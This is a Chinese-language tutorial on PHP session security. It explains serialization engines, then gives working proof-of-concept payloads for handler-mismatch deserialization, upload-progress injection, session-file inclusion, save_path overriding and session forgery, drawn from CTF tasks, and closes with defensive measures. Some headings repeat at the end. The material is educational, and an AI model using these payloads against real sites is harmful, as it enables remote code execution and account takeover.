PHP Session 安全利用详解<\/h1>

0x1 PHP Session 简介<\/h2>

0x1.1 基本概念<\/h3>

Session（会话控制）是用于存储特定用户会话所需的属性及配置信息的机制。在PHP中：<\/p>

Session变量保存的信息是单一用户的，可供应用程序中的所有页面使用<\/li>
为每个访问者创建唯一ID(UID)，基于此UID存储变量<\/li>

UID存储在cookie中或通过URL传递<\/li> <\/ul>

0x1.2 会话流程<\/h3>

会话开始时，PHP尝试从请求中查找会话ID（通常通过会话cookie）<\/li>
如果请求中不包含会话ID信息，PHP会创建新会话<\/li>
会话开始后，PHP将会话数据设置到$_SESSION<\/code>变量中<\/li>

PHP停止时，自动读取$_SESSION<\/code>内容进行序列化，发送给会话保存管理器保存<\/li>
<\/ol>
0x1.3 常见配置<\/h3>
在php.ini中的关键配置项：<\/p>
session.save_handler<\/span> =<\/span> files        # session存储方式<\/span>
<\/span><\/span>session.save_path<\/span> =<\/span> "\/var\/lib\/php\/session"  # session id存放路径<\/span>
<\/span><\/span>session.use_cookies<\/span> =<\/span> 1             # 使用cookies在客户端保存会话<\/span>
<\/span><\/span>session.use_only_cookies<\/span> =<\/span> 1        # 保护URL中传送session id的用户<\/span>
<\/span><\/span>session.name<\/span> =<\/span> PHPSESSID            # session名称<\/span>
<\/span><\/span>session.auto_start<\/span> =<\/span> 0              # 不启用请求自动初始化session<\/span>
<\/span><\/span>session.use_trans_sid<\/span> =<\/span> 0           # 禁用URL传递session id<\/span>
<\/span><\/span>session.cookie_lifetime<\/span> =<\/span> 0        # cookie存活时间(0为浏览器重启)<\/span>
<\/span><\/span>session.cookie_path<\/span> =<\/span> \/             # cookie有效路径<\/span>
<\/span><\/span>session.cookie_domain<\/span> =<\/span>             # cookie有效域名<\/span>
<\/span><\/span>session.cookie_httponly<\/span> =<\/span>           # 增加httponly标记<\/span>
<\/span><\/span>session.serialize_handler<\/span> =<\/span> php     # PHP标准序列化<\/span>
<\/span><\/span>session.gc_maxlifetime<\/span> =<\/span> 1440       # 过期时间(默认24分钟)<\/span>
<\/span><\/span><\/code><\/pre>0x1.4 存储引擎<\/h3>
PHP支持三种序列化引擎：<\/p>



存储引擎<\/th>
存储方式<\/th>
<\/tr>
<\/thead>


php_binary<\/td>
键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值<\/td>
<\/tr>

php<\/td>
键名+竖线+经过serialize()函数序列处理的值<\/td>
<\/tr>

php_serialize<\/td>
(PHP>5.5.4) 经过serialize()函数序列化处理的数组<\/td>
<\/tr>
<\/tbody>
<\/table>
修改存储引擎示例：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>ini_set<\/span>('session.serialize_handler'<\/span>, 'php_serialize'<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>\/\/ do something
<\/span><\/span><\/span><\/code><\/pre>0x2 PHP Session 利用<\/h2>
0x2.1 反序列化漏洞<\/h3>
当网站序列化存储session与反序列化读取session的方式不同时，可能导致反序列化漏洞。<\/p>
0x2.1.1 有$_SESSION<\/code>赋值的情况<\/h4>
示例代码<\/strong>：<\/p>
s1.php (使用php_serialize存储引擎)<\/p>
<?<\/span>php<\/span>
<\/span><\/span>ini_set<\/span>('session.serialize_handler'<\/span>, 'php_serialize'<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>$_SESSION["username"<\/span>]=<\/span>$_GET["u"<\/span>];
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>s2.php (使用php存储引擎)<\/p>
<?<\/span>php<\/span>
<\/span><\/span>session_start<\/span>();
<\/span><\/span>class<\/span> session<\/span> {
<\/span><\/span>    var<\/span> $var; 
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>         eval<\/span>($this-><\/span>var<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

向s1.php传入参数：s1.php?u=|O:7:"session":1:{s:3:"var";s:10:"phpinfo();";}<\/code><\/li>
php_serialize存储的内容为：a:1:{s:8:"username";s:47:"|O:7:"session":1:{s:3:"var";s:10:"phpinfo();";}";}<\/code><\/li>
访问s2.php时，php引擎以|<\/code>作为分隔符，将后半部分作为值进行反序列化，触发__destruct()<\/code>方法执行代码<\/li>
<\/ol>
0x2.1.2 无$_SESSION<\/code>赋值的情况<\/h4>
利用PHP的upload_process机制在$_SESSION<\/code>中创建可控键值对。<\/p>
示例(Jarvis OJ PHPINFO题目)<\/strong>：<\/p>
index.php<\/p>
<?<\/span>php<\/span>
<\/span><\/span>ini_set<\/span>('session.serialize_handler'<\/span>, 'php'<\/span>);
<\/span><\/span>session_start<\/span>();
<\/span><\/span>class<\/span> OowoO<\/span> {
<\/span><\/span>    public<\/span> $mdzz;
<\/span><\/span>    function<\/span> __construct() { $this-><\/span>mdzz<\/span> =<\/span> 'phpinfo();'<\/span>; }
<\/span><\/span>    function<\/span> __destruct() { eval<\/span>($this-><\/span>mdzz<\/span>); }
<\/span><\/span>}
<\/span><\/span>if<\/span>(isset<\/span>($_GET['phpinfo'<\/span>])) { $m =<\/span> new<\/span> OowoO<\/span>(); }
<\/span><\/span>else<\/span> { highlight_string<\/span>(file_get_contents<\/span>('index.php'<\/span>)); }
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

创建表单文件form.html，包含PHP_SESSION_UPLOAD_PROGRESS<\/code>变量<\/li>
使用Burp Suite修改POST请求，在PHP_SESSION_UPLOAD_PROGRESS<\/code>值后添加|<\/code>和序列化字符串<\/li>
触发反序列化执行代码<\/li>
<\/ol>
0x2.2 文件包含漏洞<\/h3>
利用条件<\/strong>：<\/p>

存在文件包含漏洞<\/li>
session文件路径已知<\/li>
session文件内容可控<\/li>
<\/ul>
示例1<\/strong>：<\/p>
session.php<\/p>
<?<\/span>php<\/span>
<\/span><\/span>session_start<\/span>();
<\/span><\/span>$_SESSION["username"<\/span>]=<\/span>$_GET['s'<\/span>];
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>include.php<\/p>
<?<\/span>php<\/span>
<\/span><\/span>include<\/span> $_GET['i'<\/span>];
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

向session.php传入一句话：session.php?s=<?php phpinfo(); ?><\/code><\/li>
通过include.php包含session文件：include.php?i=\/var\/lib\/php\/sessions\/sess_PHPSESSID<\/code><\/li>
<\/ol>
示例2(XCTF2018-Final_bestphp)<\/strong>：<\/p>
利用session_start()<\/code>覆盖session.save_path<\/code>：<\/p>
http<\/span>:\/\/<\/span>example<\/span>.<\/span>com<\/span>\/<\/span>bestphp<\/span>.<\/span>php<\/span>\/?<\/span>function<\/span>=<\/span>session_start<\/span>&<\/span>save_path<\/span>=\/<\/span>var<\/span>\/<\/span>www<\/span>\/<\/span>html<\/span>
<\/span><\/span>POST<\/span>:<\/span> name<\/span>=<?=<\/span>phpinfo<\/span>();?><\/span>
<\/span><\/span><\/span><\/code><\/pre>0x2.3 用户伪造<\/h3>
利用条件<\/strong>：<\/p>

知道PHP session存储引擎<\/li>
session文件内容可控<\/li>
<\/ul>
示例(2020虎符杯-babyupload)<\/strong>：<\/p>

下载session文件确定使用php_binary<\/code>引擎<\/li>
伪造session内容为：<0x08>username|s:5:"admin";<\/code><\/li>
上传伪造的session文件<\/li>
修改PHPSESSID为上传的文件名，获取flag<\/li>
<\/ol>
0x3 防御措施<\/h2>

统一使用相同的序列化处理器<\/li>
避免用户可控数据直接存入session<\/li>
设置session.cookie_httponly<\/code>为On<\/li>
设置合理的session.gc_maxlifetime<\/code><\/li>
对session文件存储目录设置严格权限<\/li>
避免使用已知的session存储路径<\/li>
<\/ol>
0x4 参考资源<\/h2>

PHP官方Session文档：https:\/\/www.php.net\/manual\/zh\/book.session.php<\/li>
Session安全相关文章：https:\/\/blog.spoock.com\/2016\/10\/16\/php-serialize-problem\/<\/li>
序列化安全问题：https:\/\/zhuanlan.zhihu.com\/p\/90879209<\/li>
<\/ol>

PHP Session 安全利用详解<\/h1>

0x1 PHP Session 简介<\/h2>

0x2 PHP Session 利用<\/h2>

0x2.1 反序列化漏洞<\/h3> 当网站序列化存储session与反序列化读取session的方式不同时，可能导致反序列化漏洞。<\/p>

0x4 参考资源<\/h2> PHP官方Session文档：https:\/\/www.php.net\/manual\/zh\/book.session.php<\/li> Session安全相关文章：https:\/\/blog.spoock.com\/2016\/10\/16\/php-serialize-problem\/<\/li> 序列化安全问题：https:\/\/zhuanlan.zhihu.com\/p\/90879209<\/li> <\/ol>

0x2.1 反序列化漏洞<\/h3>
当网站序列化存储session与反序列化读取session的方式不同时，可能导致反序列化漏洞。<\/p>

0x4 参考资源<\/h2>

PHP官方Session文档：https:\/\/www.php.net\/manual\/zh\/book.session.php<\/li>
Session安全相关文章：https:\/\/blog.spoock.com\/2016\/10\/16\/php-serialize-problem\/<\/li>
序列化安全问题：https:\/\/zhuanlan.zhihu.com\/p\/90879209<\/li> <\/ol>